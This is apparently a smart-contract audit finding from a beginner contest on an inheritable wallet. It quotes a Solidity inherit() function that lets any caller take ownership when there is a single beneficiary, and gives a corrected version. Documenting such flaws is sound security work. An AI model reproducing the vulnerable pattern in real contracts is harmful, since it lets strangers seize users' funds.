Inheritable Smart Contract Wallet
First Flight #35
Beginner FriendlySolidity
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Single Beneficiary Inheritance Logic Flaw

hoossayn

Summary : The inherit() function has a logical flaw when only one beneficiary exists, allowing anyone to claim ownership, not just the listed beneficiary.

Vulnerability Details : When there's only one beneficiary, the inherit() function allows msg.sender to become the owner without verifying they are the beneficiary:

function inherit() external {
if (block.timestamp < getDeadline()) {
revert InactivityPeriodNotLongEnough();
}
if (beneficiaries.length == 1) {
owner = msg.sender; // No check if msg.sender is the beneficiary!
_setDeadline();
} else if (beneficiaries.length > 1) {
isInherited = true;
} else {
revert InvalidBeneficiaries();
}
}

Impact : High. Anyone can steal a contract with a single beneficiary once the timelock expires.

Tools Used

Recommendations: Add a check to ensure only the registered beneficiary can inherit when there's a single beneficiary:

function inherit() external {
if (block.timestamp < getDeadline()) {
revert InactivityPeriodNotLongEnough();
}
if (beneficiaries.length == 1) {
if (msg.sender != beneficiaries[0]) {
revert NotBeneficiary(msg.sender);
}
owner = msg.sender;
_setDeadline();
} else if (beneficiaries.length > 1) {
// Only allow a beneficiary to trigger inheritance
bool isBeneficiary = false;
for (uint256 i = 0; i < beneficiaries.length; i++) {
if (msg.sender == beneficiaries[i]) {
isBeneficiary = true;
break;
}
}
if (!isBeneficiary) {
revert NotBeneficiary(msg.sender);
}
isInherited = true;
} else {
revert InvalidBeneficiaries();
}
}
Updates

Lead Judging Commences

0xtimefliez Lead Judge 5 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Inherit depends on msg.sender so anyone can claim the contract

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.